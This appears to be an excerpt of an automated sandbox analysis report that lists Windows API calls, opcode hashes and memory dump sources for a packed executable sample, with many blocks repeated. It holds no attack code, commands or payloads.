                                                                                                                                                                            • Instruction ID: 64f098641255dfe41087d63e3a42e1fa985690e6cf813b04e0ef51d43eda080d
                                                                                                                                                                            • Opcode Fuzzy Hash: 7774b5247e718b8d778ee8e46b15c6b54c5262b9a4d4b0e1dee9b9468aa8539f
                                                                                                                                                                            • Instruction Fuzzy Hash: D2B1CD70A04646BFEB28CF78C484BB9FBA7BF05314F18025BE45593381D729A964EB91
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00FD81C9
                                                                                                                                                                              • Part of subcall function 00FD137D: __EH_prolog.LIBCMT ref: 00FD1382
                                                                                                                                                                              • Part of subcall function 00FD137D: new.LIBCMT ref: 00FD13FA
                                                                                                                                                                              • Part of subcall function 00FD1973: __EH_prolog.LIBCMT ref: 00FD1978
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
• __EH_prolog.LIBCMT ref: 00FE9EF4
  • Part of subcall function 00FD137D: __EH_prolog.LIBCMT ref: 00FD1382
  • Part of subcall function 00FD137D: new.LIBCMT ref: 00FD13FA
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
• RtlAllocateHeap.NTDLL(00000000,?,?,?,00FF2FA6,?,0000015D,?,?,?,?,00FF4482,000000FF,00000000,?,?), ref: 00FF7ABC
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• __EH_prolog.LIBCMT ref: 00FD5A22
  • Part of subcall function 00FDAD1B: __EH_prolog.LIBCMT ref: 00FDAD20
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
• FindClose.KERNEL32(00000000,000000FF,?,?), ref: 00FDA1E0
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 00FE031D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExecutionStateThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2211380416-0
                                                                                                                                                                            • Opcode ID: 94ab8f2ba39a5977890e85efd394baea81a180e12c5e462e0f0de40f8d315763
                                                                                                                                                                            • Instruction ID: 6a8e02fdaebf2832cd379af672df94389632e7363564b54ed63bb387142f936e
                                                                                                                                                                            • Opcode Fuzzy Hash: 94ab8f2ba39a5977890e85efd394baea81a180e12c5e462e0f0de40f8d315763
                                                                                                                                                                            • Instruction Fuzzy Hash: 71D01221A151D016DA227625A9557FE36178F86761F09046AB0C5663CFCE9E08CAB3A1
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileType.KERNEL32(000000FF,00FD9683), ref: 00FD9751
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileType
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3081899298-0
                                                                                                                                                                            • Opcode ID: 215afba638ef037cfce40115b95e9e541d9b389fa3345f1bd251391a9801176d
                                                                                                                                                                            • Instruction ID: 4e80bba5c97678044a3b4890d64fc0341476e1bd258c5bb3a4d7f995c20d2665
                                                                                                                                                                            • Opcode Fuzzy Hash: 215afba638ef037cfce40115b95e9e541d9b389fa3345f1bd251391a9801176d
                                                                                                                                                                            • Instruction Fuzzy Hash: FBD0123093530095CF715E784E0905566579F43376B3CC6A6E075C41A6C762C803F500
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00FECA23
                                                                                                                                                                              • Part of subcall function 00FEA388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FEA399
                                                                                                                                                                              • Part of subcall function 00FEA388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FEA3AA
                                                                                                                                                                              • Part of subcall function 00FEA388: IsDialogMessageW.USER32(000304CA,?), ref: 00FEA3BE
                                                                                                                                                                              • Part of subcall function 00FEA388: TranslateMessage.USER32(?), ref: 00FEA3CC
                                                                                                                                                                              • Part of subcall function 00FEA388: DispatchMessageW.USER32(?), ref: 00FEA3D6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 897784432-0
                                                                                                                                                                            • Opcode ID: 72d052ebc8c4434ae2d7d5712b27d45df3c4992e6414c9f56e933be3febb7c76
                                                                                                                                                                            • Instruction ID: 8b971ab0808df4d3e21a9b0c25418cda2d6e00b8b36a61a4f9ef232f7bbe190f
                                                                                                                                                                            • Opcode Fuzzy Hash: 72d052ebc8c4434ae2d7d5712b27d45df3c4992e6414c9f56e933be3febb7c76
                                                                                                                                                                            • Instruction Fuzzy Hash: 2AD09E35144300AAD7122B91CE06F1A7AB6AB8CB04F004554B285740E1C667AD20AB12
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3664257935-0
                                                                                                                                                                            • Opcode ID: 7b46d62d6826b4eb40e5bca59d8793a71afddf3f62f6f72b41c45c2310913014
                                                                                                                                                                            • Instruction ID: ce1fd9b621dd2b485b8963c7ddb6245413e49a2f78fa7cec52bba3bf64546810
                                                                                                                                                                            • Opcode Fuzzy Hash: 7b46d62d6826b4eb40e5bca59d8793a71afddf3f62f6f72b41c45c2310913014
                                                                                                                                                                            • Instruction Fuzzy Hash: F6D0C971410311CFE3B19F28E404782BBE1AF08321B15882E90D9C2214E6754880CF40
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED1B6
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 48d8bbdf0581545e7e229fe2c274468ea7bb62c7ddf51f7613f58452e035cc9d
                                                                                                                                                                            • Instruction ID: 28d094d6044024e912d40582d1036db3c2aa93f35219ebf5348bc989659ef5e9
                                                                                                                                                                            • Opcode Fuzzy Hash: 48d8bbdf0581545e7e229fe2c274468ea7bb62c7ddf51f7613f58452e035cc9d
                                                                                                                                                                            • Instruction Fuzzy Hash: F0B0128236C240EC300A6187AD02D3A060CD2C0B14730C40FF084C6486D4494C012131
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED1B6
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 5f24c8006abdccab8db42bccaf59292d9f2a93e6623566866fb408b14fc6a0a0
                                                                                                                                                                            • Instruction ID: 43641e7f2f36ee0f262ba2076c3a65ebc693ae3d66591ab8409d6cbd3e9fbc85
                                                                                                                                                                            • Opcode Fuzzy Hash: 5f24c8006abdccab8db42bccaf59292d9f2a93e6623566866fb408b14fc6a0a0
                                                                                                                                                                            • Instruction Fuzzy Hash: 10B0128236C280EC300AB287AD02D3B020CE2C0B14730841FF084C58C5D4494C012131
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED1B6
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 02e630529be5244636abb1950cc93d4fd214b8f33fb14d8747ca16fae30c794f
                                                                                                                                                                            • Instruction ID: 6993d6b2e86c46b873d78f387e41c90802ee03182173f2976c471fb7414e12fd
                                                                                                                                                                            • Opcode Fuzzy Hash: 02e630529be5244636abb1950cc93d4fd214b8f33fb14d8747ca16fae30c794f
                                                                                                                                                                            • Instruction Fuzzy Hash: B0B0128236C240EC300A6187AC02D3A071CD2C0B14730C50FF484C6486D4484C002131
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED1B6
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: f3548fdb4661236e077120232eb731b8032fac39c1de65558d8eede439f26945
                                                                                                                                                                            • Instruction ID: 951e89448daca77978be2a94da57dd36c71942622514ea4072a078a3cd54c42f
                                                                                                                                                                            • Opcode Fuzzy Hash: f3548fdb4661236e077120232eb731b8032fac39c1de65558d8eede439f26945
                                                                                                                                                                            • Instruction Fuzzy Hash: D1B0128636C240EC300A6187AC02D3A020CE2C0B14730C80FF084C54CDD8484C402131
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED1B6
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 1faced057133102e2a5c8c275d09ba896f9db863fa793feee7ea153b10559ce8
                                                                                                                                                                            • Instruction ID: b627d25ec95863442582b039d8f9afdf42e362a241546bedc56a59ba2f94c75e
                                                                                                                                                                            • Opcode Fuzzy Hash: 1faced057133102e2a5c8c275d09ba896f9db863fa793feee7ea153b10559ce8
                                                                                                                                                                            • Instruction Fuzzy Hash: 9EB012823AC340FC300A3183ED02C3A060DD3C0B14730C50FF0C0C54C6D4484C402031
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED217
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 2cd889d96560ca955e00b361a0123eda0b1d41bf68472524370b9431b686c45a
                                                                                                                                                                            • Instruction ID: b6dfcdf54a569a9a3d2f09071eb213de1b4dde541b0e691bb5b784ef68e88b85
                                                                                                                                                                            • Opcode Fuzzy Hash: 2cd889d96560ca955e00b361a0123eda0b1d41bf68472524370b9431b686c45a
                                                                                                                                                                            • Instruction Fuzzy Hash: F2B012C63A8240EC300652CBAC02F37030DF5C0B28730C41EF044C648ADC488C002131
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED217
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 9f4bf63dfa86c16707175fd912ac9ce592dcdb156560897735dcca144731552d
                                                                                                                                                                            • Instruction ID: 2bf2a20691d643b2f56a888b47fe0fe3550d4e54553331929255178574728c64
                                                                                                                                                                            • Opcode Fuzzy Hash: 9f4bf63dfa86c16707175fd912ac9ce592dcdb156560897735dcca144731552d
                                                                                                                                                                            • Instruction Fuzzy Hash: 21B012C63A8240EC300652CBAC02E37030DE5C0B28730C41EF444C6885D8488C002131
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED7D1
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: caef8bcdd461e1e5d15509571bb5323af59a248faec4c55b6c0ec78612722ac7
                                                                                                                                                                            • Instruction ID: 1eb3e83e2110d30c98657c27fa91f63363f60f37f2bf22325525ec88a6086f2b
                                                                                                                                                                            • Opcode Fuzzy Hash: caef8bcdd461e1e5d15509571bb5323af59a248faec4c55b6c0ec78612722ac7
                                                                                                                                                                            • Instruction Fuzzy Hash: 9BB0128A368340FC310612C3AD02C36131CD3C0F55730C50EF040C44CDD4404C402073
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00FED1B6
  • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
  • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00FED1B6
  • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
  • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00FED217
  • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
